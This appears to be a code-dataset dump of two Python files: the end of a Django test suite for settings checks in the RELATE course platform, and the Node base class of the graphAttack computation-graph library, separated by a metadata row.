        # Using only the deprecated misspelled name -> W003.
        self.assertCheckMessages(["relate_email_appellation_priority_list.W003"])

    @override_settings(RELATE_EMAIL_APPELATION_PRIORITY_LIST=None,
                       RELATE_EMAIL_APPELLATION_PRIORITY_LIST=None)
    def test_relate_email_appellation_priority_list_type_deprecated_none(self):
        self.assertCheckMessages([])
class CheckRelateEmailConnections(CheckRelateSettingsBase):
    """Checks for the EMAIL_CONNECTIONS setting (a dict of label ->
    connection-kwargs dict)."""

    msg_id_prefix = "email_connections"

    VALID_CONF_NONE = None
    VALID_CONF_EMPTY_DICT = {}
    VALID_CONF = {
        "robot": {
            'backend': 'django.core.mail.backends.console.EmailBackend',
            'host': 'smtp.gmail.com',
            'username': 'blah@blah.com',
            'password': 'password',
            'port': 587,
            'use_tls': True,
        },
        "other": {}
    }
    INVALID_CONF_EMPTY_LIST = []
    INVALID_CONF_LIST = [VALID_CONF]
    INVALID_CONF_LIST_AS_ITEM_VALUE = {
        "robot": ['blah@blah.com'],
        "other": [],
        "yet_another": {}
    }
    INVALID_CONF_INVALID_BACKEND = {
        "robot": {
            'backend': 'an.invalid.emailBackend',  # invalid backend
            'host': 'smtp.gmail.com',
            'username': 'blah@blah.com',
            'password': 'password',
            'port': 587,
            'use_tls': True,
        },
        "other": {}
    }

    @override_settings(EMAIL_CONNECTIONS=VALID_CONF_NONE)
    def test_valid_email_connections_none(self):
        self.assertCheckMessages([])

    @override_settings(EMAIL_CONNECTIONS=VALID_CONF_EMPTY_DICT)
    def test_valid_email_connections_emtpy_dict(self):
        self.assertCheckMessages([])

    @override_settings(EMAIL_CONNECTIONS=VALID_CONF)
    def test_valid_email_connections(self):
        self.assertCheckMessages([])

    @override_settings(EMAIL_CONNECTIONS=INVALID_CONF_EMPTY_LIST)
    def test_invalid_email_connections_empty_list(self):
        # Any list (even empty) is the wrong container type -> E001.
        self.assertCheckMessages(["email_connections.E001"])

    @override_settings(EMAIL_CONNECTIONS=INVALID_CONF_LIST)
    def test_invalid_email_connections_list(self):
        self.assertCheckMessages(["email_connections.E001"])

    @override_settings(EMAIL_CONNECTIONS=INVALID_CONF_LIST_AS_ITEM_VALUE)
    def test_invalid_email_connections_list_as_item_value(self):
        # One E002 per non-dict item value ("robot" and "other" above).
        self.assertCheckMessages(
            ["email_connections.E002", "email_connections.E002"])

    @override_settings(EMAIL_CONNECTIONS=INVALID_CONF_INVALID_BACKEND)
    def test_invalid_email_connections_invalid_backend(self):
        # An unimportable backend path -> E003.
        self.assertCheckMessages(["email_connections.E003"])
class CheckRelateFacilities(CheckRelateSettingsBase):
    """Checks for the RELATE_FACILITIES setting (a dict — or a callable
    returning a dict — of facility name -> properties dict)."""

    msg_id_prefix = "relate_facilities"

    VALID_CONF_NONE = None
    VALID_CONF = (
        {
            "test_center": {
                "ip_ranges": ["192.168.192.0/24"],
                "exams_only": False},
            "test_center2": {
                "ip_ranges": ["192.168.10.0/24"]},
        })
    INVALID_CONF_LIST = []
    INVALID_CONF_NOT_DICT_AS_ITEM_VALUE = (
        {
            "test_center": {
                "ip_ranges": ["192.168.192.0/24"],
                "exams_only": False},
            "test_center2": [],  # not a dict
            "test_center3": ("192.168.10.0/24"),  # not a dict
        })
    INVALID_CONF_IP_RANGES_NOT_LIST = (
        {
            "test_center": {
                "ip_ranges": "192.168.192.0/24",  # not a list
                "exams_only": False},
            "test_center2": [],
        })
    INVALID_CONF_IP_RANGES_ITEM_NOT_IPADDRESS = (
        {
            "test_center": {
                "ip_ranges": ["www.example.com", "localhost"]  # invalid ipadd
            },
        })
    WARNING_CONF_IP_RANGES_NOT_CONFIGURED = (
        {
            "test_center": {"exams_only": False},
            "test_center2": {},
        })

    @override_settings(RELATE_FACILITIES=VALID_CONF_NONE)
    def test_valid_relate_facilities_none(self):
        self.assertCheckMessages([])

    @override_settings(RELATE_FACILITIES=VALID_CONF)
    def test_valid_relate_facilities(self):
        self.assertCheckMessages([])

    def test_valid_relate_facilities_callable(self):
        def valid_func(now_datetime):
            from django.utils.timezone import now
            if now_datetime > now():
                return self.VALID_CONF
            else:
                return {}

        with override_settings(RELATE_FACILITIES=valid_func):
            self.assertCheckMessages([])

    def test_valid_relate_facilities_callable_with_empty_ip_ranges(self):
        def valid_func_though_return_emtpy_ip_ranges(now_datetime):
            # this won't result in warnning, because the facility is defined
            # by a callable.
            return self.WARNING_CONF_IP_RANGES_NOT_CONFIGURED

        with override_settings(
                RELATE_FACILITIES=valid_func_though_return_emtpy_ip_ranges):
            self.assertCheckMessages([])

    @override_settings(RELATE_FACILITIES=INVALID_CONF_LIST)
    def test_invalid_relate_facilities_callable_return_list(self):
        self.assertCheckMessages(["relate_facilities.E002"])

    @override_settings(RELATE_FACILITIES=INVALID_CONF_NOT_DICT_AS_ITEM_VALUE)
    def test_invalid_relate_facilities_callable_not_dict_as_item_value(self):
        # One E003 per non-dict facility value.
        self.assertCheckMessages(
            ["relate_facilities.E003", "relate_facilities.E003"])

    @override_settings(RELATE_FACILITIES=INVALID_CONF_IP_RANGES_NOT_LIST)
    def test_invalid_relate_facilities_ip_ranges_not_list(self):
        self.assertCheckMessages(
            ["relate_facilities.E003", "relate_facilities.E004"],
            ignore_order=True)

    @override_settings(RELATE_FACILITIES=INVALID_CONF_IP_RANGES_ITEM_NOT_IPADDRESS)
    def test_invalid_relate_facilities_ip_ranges_item_not_ipaddress(self):
        # One E005 per non-IP-address entry in ip_ranges.
        self.assertCheckMessages(
            ["relate_facilities.E005", "relate_facilities.E005"],
            ignore_order=True)

    def test_invalid_relate_facilities_callable_not_return_dict(self):
        def invalid_func_not_return_dict(now_datetime):
            return self.INVALID_CONF_LIST

        with override_settings(RELATE_FACILITIES=invalid_func_not_return_dict):
            self.assertCheckMessages(["relate_facilities.E001"])

    def test_invalid_relate_facilities_callable_return_invalid_conf(self):
        def invalid_func_return_invalid_conf(now_datetime):
            return self.INVALID_CONF_NOT_DICT_AS_ITEM_VALUE

        with override_settings(RELATE_FACILITIES=invalid_func_return_invalid_conf):
            self.assertCheckMessages(
                ["relate_facilities.E003", "relate_facilities.E003"])

    def test_invalid_relate_facilities_callable_return_none(self):
        def invalid_func_return_none(now_datetime):
            return None

        with override_settings(RELATE_FACILITIES=invalid_func_return_none):
            self.assertCheckMessages(["relate_facilities.E001"])

    @override_settings(RELATE_FACILITIES=WARNING_CONF_IP_RANGES_NOT_CONFIGURED)
    def test_warning_relate_facilities(self):
        # One W001 per facility with no ip_ranges configured.
        self.assertCheckMessages(
            ["relate_facilities.W001", "relate_facilities.W001"])
class CheckRelateMaintenanceModeExceptions(CheckRelateSettingsBase):
    """Checks for RELATE_MAINTENANCE_MODE_EXCEPTIONS (a list of IP strings)."""

    msg_id_prefix = "relate_maintenance_mode_exceptions"

    VALID_CONF_NONE = None
    VALID_CONF_EMPTY_LIST = []
    VALID_CONF = ["127.0.0.1", "192.168.1.1"]
    INVALID_CONF_STR = "127.0.0.1"
    INVALID_CONF_DICT = {"localhost": "127.0.0.1",
                         "www.myrelate.com": "192.168.1.1"}
    INVALID_CONF_INVALID_IPS = ["localhost", "www.myrelate.com"]

    @override_settings(RELATE_MAINTENANCE_MODE_EXCEPTIONS=VALID_CONF_NONE)
    def test_valid_maintenance_mode_exceptions_none(self):
        self.assertCheckMessages([])

    @override_settings(RELATE_MAINTENANCE_MODE_EXCEPTIONS=VALID_CONF_EMPTY_LIST)
    def test_valid_maintenance_mode_exceptions_emtpy_list(self):
        self.assertCheckMessages([])

    @override_settings(RELATE_MAINTENANCE_MODE_EXCEPTIONS=VALID_CONF)
    def test_valid_maintenance_mode_exceptions(self):
        self.assertCheckMessages([])

    @override_settings(RELATE_MAINTENANCE_MODE_EXCEPTIONS=INVALID_CONF_STR)
    def test_invalid_maintenance_mode_exceptions_str(self):
        # Wrong container type (string instead of list) -> E001.
        self.assertCheckMessages(["relate_maintenance_mode_exceptions.E001"])

    @override_settings(RELATE_MAINTENANCE_MODE_EXCEPTIONS=INVALID_CONF_DICT)
    def test_invalid_maintenance_mode_exceptions_dict(self):
        self.assertCheckMessages(["relate_maintenance_mode_exceptions.E001"])

    @override_settings(RELATE_MAINTENANCE_MODE_EXCEPTIONS=INVALID_CONF_INVALID_IPS)
    def test_invalid_maintenance_mode_exceptions_invalid_ipaddress(self):
        # One E002 per non-IP-address entry.
        self.assertCheckMessages(["relate_maintenance_mode_exceptions.E002",
                                  "relate_maintenance_mode_exceptions.E002"])
class CheckRelateSessionRestartCooldownSeconds(CheckRelateSettingsBase):
    """Checks for RELATE_SESSION_RESTART_COOLDOWN_SECONDS (a non-negative
    number, optional)."""

    msg_id_prefix = "relate_session_restart_cooldown_seconds"

    VALID_CONF = 10
    VALID_CONF_BY_CALC = 2 * 5
    INVALID_CONF_STR = "10"
    INVALID_CONF_LIST = [10]
    INVALID_CONF_NEGATIVE = -10

    @override_settings()
    def test_valid_relate_session_restart_cooldown_seconds_not_configured(self):
        # The setting is optional: removing it entirely is valid.
        del settings.RELATE_SESSION_RESTART_COOLDOWN_SECONDS
        self.assertCheckMessages([])

    @override_settings(RELATE_SESSION_RESTART_COOLDOWN_SECONDS=None)
    def test_valid_relate_session_restart_cooldown_seconds_none(self):
        self.assertCheckMessages([])

    @override_settings(RELATE_SESSION_RESTART_COOLDOWN_SECONDS=VALID_CONF)
    def test_valid_relate_session_restart_cooldown_seconds(self):
        self.assertCheckMessages([])

    @override_settings(RELATE_SESSION_RESTART_COOLDOWN_SECONDS=VALID_CONF_BY_CALC)
    def test_valid_relate_session_restart_cooldown_seconds_by_calc(self):
        self.assertCheckMessages([])

    # The three tests below were previously misnamed
    # "test_invalid_maintenance_mode_exceptions_*" (copy/paste from
    # CheckRelateMaintenanceModeExceptions); renamed to reflect the
    # setting actually under test.
    @override_settings(RELATE_SESSION_RESTART_COOLDOWN_SECONDS=INVALID_CONF_STR)
    def test_invalid_relate_session_restart_cooldown_seconds_str(self):
        # Must be a number, not a string -> E001.
        self.assertCheckMessages(
            ["relate_session_restart_cooldown_seconds.E001"])

    @override_settings(RELATE_SESSION_RESTART_COOLDOWN_SECONDS=INVALID_CONF_LIST)
    def test_invalid_relate_session_restart_cooldown_seconds_list(self):
        self.assertCheckMessages(
            ["relate_session_restart_cooldown_seconds.E001"])

    @override_settings(RELATE_SESSION_RESTART_COOLDOWN_SECONDS=INVALID_CONF_NEGATIVE)
    def test_invalid_relate_session_restart_cooldown_seconds_negative(self):
        # Negative durations are rejected -> E002.
        self.assertCheckMessages(
            ["relate_session_restart_cooldown_seconds.E002"])
class CheckRelateTicketMinutesValidAfterUse(CheckRelateSettingsBase):
    """Checks for RELATE_TICKET_MINUTES_VALID_AFTER_USE (a non-negative
    number, optional)."""

    msg_id_prefix = "relate_ticket_minutes_valid_after_use"

    VALID_CONF = 10
    VALID_CONF_BY_CALC = 2 * 5
    INVALID_CONF_STR = "10"
    INVALID_CONF_LIST = [10]
    INVALID_CONF_NEGATIVE = -10

    @override_settings()
    def test_valid_relate_ticket_not_configured(self):
        # The setting is optional: removing it entirely is valid.
        del settings.RELATE_TICKET_MINUTES_VALID_AFTER_USE
        self.assertCheckMessages([])

    @override_settings(RELATE_TICKET_MINUTES_VALID_AFTER_USE=None)
    def test_valid_relate_ticket_none(self):
        self.assertCheckMessages([])

    @override_settings(RELATE_TICKET_MINUTES_VALID_AFTER_USE=VALID_CONF)
    def test_valid_relate_ticket_minutes_valid_after_use(self):
        self.assertCheckMessages([])

    @override_settings(RELATE_TICKET_MINUTES_VALID_AFTER_USE=VALID_CONF_BY_CALC)
    def test_valid_relate_ticket_minutes_valid_after_use_by_calc(self):
        self.assertCheckMessages([])

    @override_settings(RELATE_TICKET_MINUTES_VALID_AFTER_USE=INVALID_CONF_STR)
    def test_invalid_relate_ticket_minutes_valid_after_use_str(self):
        # Must be a number, not a string -> E001.
        self.assertCheckMessages(
            ["relate_ticket_minutes_valid_after_use.E001"])

    @override_settings(RELATE_TICKET_MINUTES_VALID_AFTER_USE=INVALID_CONF_LIST)
    def test_invalid_relate_ticket_minutes_valid_after_use_list(self):
        self.assertCheckMessages(
            ["relate_ticket_minutes_valid_after_use.E001"])

    @override_settings(RELATE_TICKET_MINUTES_VALID_AFTER_USE=INVALID_CONF_NEGATIVE)
    def test_invalid_relate_ticket_minutes_valid_after_use_negative(self):
        # Negative durations are rejected -> E002.
        self.assertCheckMessages(
            ["relate_ticket_minutes_valid_after_use.E002"])
def side_effect_os_path_is_dir(*args, **kwargs):
    """Mock side effect for ``os.path.isdir``.

    Any path starting with "dir" is treated as an existing directory.
    """
    path = args[0]
    return path.startswith("dir")
def side_effect_os_access(*args, **kwargs):
    """Mock side effect for ``os.access``.

    Permission is denied for paths ending in "NEITHER" (any mode),
    "W_FAIL" (write mode only) or "R_FAIL" (read mode only); every other
    combination is granted.
    """
    path = args[0]
    if path.endswith("NEITHER"):
        return False
    if path.endswith("W_FAIL"):
        return args[1] != os.W_OK
    if path.endswith("R_FAIL"):
        return args[1] != os.R_OK
    return True
@mock.patch('os.access', side_effect=side_effect_os_access)
@mock.patch("os.path.isdir", side_effect=side_effect_os_path_is_dir)
class CheckGitRoot(CheckRelateSettingsBase):
    """Checks for the GIT_ROOT setting.

    Note on mock argument order: stacked class-level ``mock.patch``
    decorators are applied bottom-up, so the patch closest to the class
    (``os.path.isdir``) supplies the FIRST injected mock argument,
    followed by ``os.access``. The parameter names below reflect that
    order (they were previously swapped — harmless only because the
    mocks are never used inside the tests).
    """

    msg_id_prefix = "git_root"

    VALID_GIT_ROOT = "dir/git/root/path"
    INVALID_GIT_ROOT_NONE = None
    INVALID_GIT_ROOT_LIST = [VALID_GIT_ROOT]
    INVALID_GIT_ROOT_SPACES = " "
    INVALID_GIT_ROOT_NOT_DIR = "not_dir/git/root/path"
    INVALID_GIT_ROOT_W_FAIL = "dir/git/root/path/W_FAIL"
    INVALID_GIT_ROOT_R_FAIL = "dir/git/root/path/R_FAIL"
    INVALID_GIT_ROOT_W_R_FAIL = "dir/git/root/path/NEITHER"

    @override_settings(GIT_ROOT=VALID_GIT_ROOT)
    def test_valid_git_root(self, mocked_os_path_is_dir, mocked_os_access):
        self.assertCheckMessages([])

    @override_settings(GIT_ROOT=INVALID_GIT_ROOT_NONE)
    def test_invalid_git_root_none(self, mocked_os_path_is_dir, mocked_os_access):
        self.assertCheckMessages(["git_root.E001"])

    @override_settings(GIT_ROOT=INVALID_GIT_ROOT_LIST)
    def test_invalid_git_root_list(self, mocked_os_path_is_dir, mocked_os_access):
        self.assertCheckMessages(["git_root.E002"])

    @override_settings(GIT_ROOT=INVALID_GIT_ROOT_SPACES)
    def test_invalid_git_root_spaces(self, mocked_os_path_is_dir, mocked_os_access):
        self.assertCheckMessages(["git_root.E003"])

    @override_settings(GIT_ROOT=INVALID_GIT_ROOT_NOT_DIR)
    def test_invalid_git_root(self, mocked_os_path_is_dir, mocked_os_access):
        self.assertCheckMessages(["git_root.E003"])

    @override_settings(GIT_ROOT=INVALID_GIT_ROOT_W_FAIL)
    def test_invalid_git_root_no_write_perm(
            self, mocked_os_path_is_dir, mocked_os_access):
        # no write permission
        self.assertCheckMessages(["git_root.E004"])

    @override_settings(GIT_ROOT=INVALID_GIT_ROOT_R_FAIL)
    def test_invalid_git_root_no_read_perms(
            self, mocked_os_path_is_dir, mocked_os_access):
        # no read permission
        self.assertCheckMessages(["git_root.E005"])

    @override_settings(GIT_ROOT=INVALID_GIT_ROOT_W_R_FAIL)
    def test_invalid_git_root_no_both_perms(
            self, mocked_os_path_is_dir, mocked_os_access):
        # no write and read permissions
        self.assertCheckMessages(["git_root.E004", "git_root.E005"])
class CheckRelateCourseLanguages(CheckRelateSettingsBase):
    """
    For these tests to pass, LANGUAGE_CODE, LANGUAGES, USE_I18N in
    local_settings_example.py should not be configured."""

    msg_id_prefix = "relate_languages"

    VALID_CONF1 = [
        ('en', _('my English')),
        ('zh-hans', _('Simplified Chinese')),
        ('de', _('German'))]
    VALID_CONF2 = (
        ('en', _('English')),
        ('zh-hans', _('Simplified Chinese')),
        ('de', _('German')))
    VALID_CONF3 = (
        ('en', 'English'),
        ('zh-hans', 'Simplified Chinese'),
        ('de', _('German')))
    # 'zh-hans' appears twice: still valid, but should warn.
    VALID_WITH_WARNNING_CONF = (
        ('en', 'English'),
        ('zh-hans', 'Simplified Chinese'),
        ('zh-hans', 'my Simplified Chinese'),
        ('de', _('German')))
    VALID_CONF4 = [('en', ('English',)), ]
    VALID_CONF5 = (['en', 'English'],)
    VALID_CONF6 = [(('en',), _('English')), ]
    INVALID_CONF1 = {
        'en': 'English',
        'zh-hans': 'Simplified Chinese',
        'de': _('German')}
    INVALID_CONF2 = (('en',),)
    INVALID_CONF3 = [('en',), ([], 'English'), ["1", "2"]]
    INVALID_CONF4 = "some thing"

    def test_valid(self):
        with override_settings(LANGUAGES=self.VALID_CONF1):
            self.assertCheckMessages([])
        with override_settings(LANGUAGES=self.VALID_CONF2):
            self.assertCheckMessages([])
        with override_settings(LANGUAGES=self.VALID_CONF3):
            self.assertCheckMessages([])
        with override_settings(LANGUAGES=self.VALID_CONF4):
            self.assertCheckMessages([])
        with override_settings(LANGUAGES=self.VALID_CONF5):
            self.assertCheckMessages([])
        with override_settings(LANGUAGES=self.VALID_CONF6):
            self.assertCheckMessages([])

    def test_lang_not_list_or_tuple(self):
        with override_settings(LANGUAGES=self.INVALID_CONF1):
            self.assertCheckMessages(["relate_languages.E002"])

    def test_lang_item_not_2_tuple(self):
        with override_settings(LANGUAGES=self.INVALID_CONF2):
            self.assertCheckMessages(["relate_languages.E002"])

    def test_lang_multiple_error(self):
        with override_settings(LANGUAGES=self.INVALID_CONF3):
            self.assertCheckMessages(["relate_languages.E002"])

    def test_lang_type_string(self):
        with override_settings(LANGUAGES=self.INVALID_CONF4):
            self.assertCheckMessages(["relate_languages.E001"])

    def test_item_having_same_lang_code_with_settings_language_code(self):
        with override_settings(LANGUAGES=self.VALID_CONF1, LANGUAGE_CODE="en"):
            # This should not generate warning of duplicate language entries
            # since that is how Django works.
            self.assertCheckMessages([])

    def test_item_duplicated_inside_settings_languages(self):
        with override_settings(LANGUAGES=self.VALID_WITH_WARNNING_CONF,
                               LANGUAGE_CODE="en-us"):
            self.assertCheckMessages(
                expected_ids=["relate_languages.W001"],
                # 'my Simplified Chinese' is used for language description of
                # 'zh-hans' instead of 'Simplified Chinese'
                expected_msgs=[
                    "Duplicate language entries were found in "
                    "settings.LANGUAGES for 'zh-hans', 'my Simplified "
                    "Chinese' will be used as its "
                    "language_description"]
            )
class CheckRelateSiteName(CheckRelateSettingsBase):
    """Checks for RELATE_SITE_NAME (a required, non-blank string)."""

    msg_id_prefix = "relate_site_name"

    VALID_CONF = "My RELATE"
    INVALID_CONF = ["My RELATE"]

    def test_site_name_not_configured(self):
        # Unlike most settings here, this one is mandatory -> E001.
        with override_settings():
            del settings.RELATE_SITE_NAME
            self.assertCheckMessages(["relate_site_name.E001"])

    def test_site_name_none(self):
        with override_settings(RELATE_SITE_NAME=None):
            self.assertCheckMessages(["relate_site_name.E002"])

    def test_site_name_invalid_instance_error(self):
        with override_settings(RELATE_SITE_NAME=self.INVALID_CONF):
            self.assertCheckMessages(["relate_site_name.E003"])

    def test_site_name_blank_string(self):
        with override_settings(RELATE_SITE_NAME=" "):
            self.assertCheckMessages(["relate_site_name.E004"])
# The only template-override directory the mocked os.path.isdir will accept.
TEST_MY_OVERRIDING_TEMPLATES_DIR = "/path/to/my_template/"


def is_dir_side_effect(*args, **kwargs):
    """Mock side effect for ``os.path.isdir``: only the known template
    directory is reported as existing."""
    return TEST_MY_OVERRIDING_TEMPLATES_DIR in args
class CheckRelateTemplatesDirs(CheckRelateSettingsBase):
    """Checks for RELATE_OVERRIDE_TEMPLATES_DIRS (an optional list of
    existing directory paths)."""

    msg_id_prefix = "relate_override_templates_dirs"

    VALID_CONF = [TEST_MY_OVERRIDING_TEMPLATES_DIR]
    INVALID_CONF1 = TEST_MY_OVERRIDING_TEMPLATES_DIR  # string
    INVALID_CONF2 = [(TEST_MY_OVERRIDING_TEMPLATES_DIR,)]  # items not string
    INVALID_CONF3 = [TEST_MY_OVERRIDING_TEMPLATES_DIR,
                     "some/where/does/not/exist",
                     "yet/another/invalid/path"]

    def test_valid_conf(self):
        with override_settings(RELATE_OVERRIDE_TEMPLATES_DIRS=self.VALID_CONF):
            # Patch isdir so only TEST_MY_OVERRIDING_TEMPLATES_DIR "exists".
            with mock.patch("relate.checks.os.path.isdir",
                            side_effect=is_dir_side_effect):
                self.assertCheckMessages([])

    def test_not_configured(self):
        with override_settings():
            del settings.RELATE_OVERRIDE_TEMPLATES_DIRS
            self.assertCheckMessages([])

    def test_configured_none(self):
        with override_settings(RELATE_OVERRIDE_TEMPLATES_DIRS=None):
            self.assertCheckMessages([])

    def test_invalid_instance_error(self):
        with override_settings(RELATE_OVERRIDE_TEMPLATES_DIRS=self.INVALID_CONF1):
            self.assertCheckMessages(["relate_override_templates_dirs.E001"])

    def test_invalid_item_instance_error(self):
        with override_settings(RELATE_OVERRIDE_TEMPLATES_DIRS=self.INVALID_CONF2):
            self.assertCheckMessages(["relate_override_templates_dirs.E002"])

    def test_invalid_path(self):
        # One W001 per non-existing directory in the list.
        with override_settings(RELATE_OVERRIDE_TEMPLATES_DIRS=self.INVALID_CONF3):
            with mock.patch("relate.checks.os.path.isdir",
                            side_effect=is_dir_side_effect):
                self.assertCheckMessages(
                    ["relate_override_templates_dirs.W001",
                     "relate_override_templates_dirs.W001"])
class CheckRelateCustomPageTypesRemovedDeadline(CheckRelateSettingsBase):
    """Checks for RELATE_CUSTOM_PAGE_TYPES_REMOVED_DEADLINE (an optional
    datetime instance)."""

    msg_id_prefix = "relate_custom_page_types_removed_deadline"

    VALID_CONF = datetime(2017, 12, 31, 0, 0)
    INVALID_CONF = "2017-12-31 00:00"

    @override_settings(RELATE_CUSTOM_PAGE_TYPES_REMOVED_DEADLINE=None)
    def test_valid_conf_none(self):
        self.assertCheckMessages([])

    @override_settings(RELATE_CUSTOM_PAGE_TYPES_REMOVED_DEADLINE=VALID_CONF)
    def test_valid_conf(self):
        self.assertCheckMessages([])

    @override_settings(RELATE_CUSTOM_PAGE_TYPES_REMOVED_DEADLINE=INVALID_CONF)
    def test_invalid_conf(self):
        # A date string (not a datetime object) -> E001.
        self.assertCheckMessages(
            ["relate_custom_page_types_removed_deadline.E001"])
class CheckRelateDisableCodehiliteMarkdownExtensions(CheckRelateSettingsBase):
    """Checks for RELATE_DISABLE_CODEHILITE_MARKDOWN_EXTENSION (expected
    to be True or unset; other values only warn)."""

    msg_id_prefix = "relate_disable_codehilite_markdown_extension"

    VALID_CONF = None
    VALID_CONF_NO_WARNING = True
    WARNING_CONF_NOT_BOOL1 = "some string"
    WARNING_CONF_NOT_BOOL2 = ["markdown.extensions.codehilite"]
    WARNING_CONF_FALSE = False

    @override_settings(RELATE_DISABLE_CODEHILITE_MARKDOWN_EXTENSION=VALID_CONF)
    def test_valid_conf(self):
        self.assertCheckMessages([])

    @override_settings(
        RELATE_DISABLE_CODEHILITE_MARKDOWN_EXTENSION=VALID_CONF_NO_WARNING)
    def test_valid_conf_no_warning(self):
        self.assertCheckMessages([])

    @override_settings(
        RELATE_DISABLE_CODEHILITE_MARKDOWN_EXTENSION=WARNING_CONF_NOT_BOOL1)
    def test_warning_conf_not_bool1(self):
        # Non-boolean values -> W001.
        self.assertCheckMessages(
            ["relate_disable_codehilite_markdown_extension.W001"])

    @override_settings(
        RELATE_DISABLE_CODEHILITE_MARKDOWN_EXTENSION=WARNING_CONF_NOT_BOOL2)
    def test_warning_conf_not_bool2(self):
        self.assertCheckMessages(
            ["relate_disable_codehilite_markdown_extension.W001"])

    @override_settings(
        RELATE_DISABLE_CODEHILITE_MARKDOWN_EXTENSION=WARNING_CONF_FALSE)
    def test_warning_conf_false(self):
        # Explicitly False -> W002.
        self.assertCheckMessages(
            ["relate_disable_codehilite_markdown_extension.W002"])
class RelateStartupChecksExtraCheckTest(CheckRelateSettingsBase):
    """Tests for register_startup_checks_extra() and the
    RELATE_STARTUP_CHECKS_EXTRA setting (a list/tuple of dotted paths to
    extra check functions)."""

    msg_id_prefix = "my_custom_check_msg"

    INSTANCE_WRONG1 = "tests.resouce.my_check_func"
    INSTANCE_WRONG2 = {"path": "tests.resouce.my_check_func"}

    @override_settings()
    def test_not_configured(self):
        # Missing setting: registration is a no-op, no error.
        del settings.RELATE_STARTUP_CHECKS_EXTRA
        register_startup_checks_extra()

    @override_settings(RELATE_STARTUP_CHECKS_EXTRA=None)
    def test_none(self):
        register_startup_checks_extra()

    @override_settings(RELATE_STARTUP_CHECKS_EXTRA=INSTANCE_WRONG1)
    def test_instance_error1(self):
        # A bare string is rejected with ImproperlyConfigured.
        with self.assertRaises(ImproperlyConfigured) as cm:
            register_startup_checks_extra()
        expected_error_msg = (
            "RELATE_STARTUP_CHECKS_EXTRA must be an instance of list or tuple")
        self.assertIn(expected_error_msg, str(cm.exception))

    @override_settings(RELATE_STARTUP_CHECKS_EXTRA=INSTANCE_WRONG2)
    def test_instance_error2(self):
        # A dict is rejected as well.
        with self.assertRaises(ImproperlyConfigured) as cm:
            register_startup_checks_extra()
        expected_error_msg = (
            "RELATE_STARTUP_CHECKS_EXTRA must be an instance of list or tuple")
        self.assertIn(expected_error_msg, str(cm.exception))

    @override_settings(RELATE_STARTUP_CHECKS_EXTRA=[])
    def test_empty_list(self):
        register_startup_checks_extra()

    @override_settings(RELATE_STARTUP_CHECKS_EXTRA=[
        "unknown_package.unknown_module.func"])
    def test_not_importable_check_func(self):
        # Unimportable dotted paths surface the underlying ImportError text.
        with self.assertRaises(ImproperlyConfigured) as cm:
            register_startup_checks_extra()
        expected_error_msg = ("No module named 'unknown_package'")
        self.assertIn(expected_error_msg, str(cm.exception))

    @override_settings(RELATE_STARTUP_CHECKS_EXTRA=[
        "tests.resource.my_custom_check_func1",
        "tests.resource.my_custom_check_func2"])
    def test_do_check(self):
        # Each listed function must be registered with Django's check
        # framework exactly once.
        from tests.utils import mock
        with mock.patch("relate.checks.register") as mock_register:
            register_startup_checks_extra()
            self.assertEqual(mock_register.call_count, 2)
            stringified_call_args = ". ".join(
                [repr(call) for call in mock_register.call_args_list])
            self.assertIn(
                "function my_custom_check_func1", stringified_call_args)
            self.assertIn(
                "function my_custom_check_func2", stringified_call_args)
| 40.095707 | 103 | 0.682691 |
acfa90fbed67013136a9f174a23c4d665cb18fe6 | 6,604 | py | Python | graphAttack/coreNode.py | jgolebiowski/graphAttack | ec8488444b44d0bd54498bf917ee42d821643ee8 | [
"MIT"
] | 51 | 2017-08-16T13:04:43.000Z | 2022-03-30T09:10:30.000Z | graphAttack/coreNode.py | jgolebiowski/graphAttack | ec8488444b44d0bd54498bf917ee42d821643ee8 | [
"MIT"
] | null | null | null | graphAttack/coreNode.py | jgolebiowski/graphAttack | ec8488444b44d0bd54498bf917ee42d821643ee8 | [
"MIT"
] | 12 | 2017-09-27T01:10:02.000Z | 2021-05-05T09:44:56.000Z | """Node definition"""
import numpy as np
class Node(object):
    """Node - a basic building block of the graph

    Attributes
    ----------
    endNode : bool
        Flag stating whether this is the final node of the graph
    name : str
        name of the node
    outputs : list
        list of nodes that operate on output of this node
    referenceNumber : int
        reference number of this node
    result : np.array
        output of this node
    shape : tuple
        shape
    """
    # Class-level defaults; overwritten per instance as the graph is built.
    shape = None
    name = "Node"
    referenceNumber = None

    def __init__(self):
        # A freshly created node is an endpoint: no consumers, no result yet.
        self.outputs = []
        self.result = None
        self.endNode = True
def __repr__(self):
"""Represent as a string - usefull for printing
Returns
-------
str
description of this node
"""
output = "<%s>" % self.name
return output
def __add__(self, other):
"""Add operaition through operator overloading
Parameters
----------
other : ga.Node
Second Node ot perform the operation on
Returns
-------
ga.operation
AddOperation
Raises
------
ValueError
This can only be performed on two Node instances
"""
if not isinstance(other, Node):
raise ValueError("This can only be performed on two Node instances")
return AddOperation(self, other)
def __matmul__(self, other):
"""matmul operaition through operator overloading
Parameters
----------
other : ga.Node
Second Node ot perform the operation on
Returns
-------
ga.operation
MatMatmulOperation
Raises
------
ValueError
This can only be performed on two Node instances
"""
if not isinstance(other, Node):
raise ValueError("This can only be performed on two Node instances")
return MatMatmulOperation(self, other)
def __mul__(self, other):
"""multiply operaition through operator overloading
Parameters
----------
other : ga.Node
Second Node ot perform the operation on
Returns
-------
ga.operation
MultiplyOperation
Raises
------
ValueError
This can only be performed on two Node instances
"""
if not isinstance(other, Node):
raise ValueError("This can only be performed on two Node instances")
return MultiplyOperation(self, other)
def __truediv__(self, other):
"""Divide operaition through operator overloading
Parameters
----------
other : ga.Node
Second Node ot perform the operation on
Returns
-------
ga.operation
DivideOperation
Raises
------
ValueError
This can only be performed on two Node instances
"""
if not isinstance(other, Node):
raise ValueError("This can only be performed on two Node instances")
return DivideOperation(self, other)
def prependName(self, string):
"""Prepend name with a string
Parameters
----------
string : str
prefix
"""
self.name = str(string) + self.name
def assignReferenceNumber(self, number):
"""Assign a reference number
Parameters
----------
number : int
reference number
"""
self.referenceNumber = number
self.prependName("op" + str(number) + "-")
def setShape(self):
"""Set the shape of the output of this node"""
raise NotImplementedError("This is an abstract class, this routine should be implemented in children")
def addOutput(self, output):
"""Attach the node that is the output of this Node
Parameters
----------
output : ga.Node
attach an output node to this node
"""
self.outputs.append(output)
self.endNode = False
def resetOutputs(self):
"""Reset outputs of this node"""
self.outputs = []
self.endNode = True
def reset(self):
"""Reset the values and gradients held by this operation"""
raise NotImplemented("This is an abstract class")
def getValue(self):
"""Return a vaue of this operation"""
if (self.result is None):
raise NotImplemented("The result is not set at initialization, maybe use an operation")
return self.result
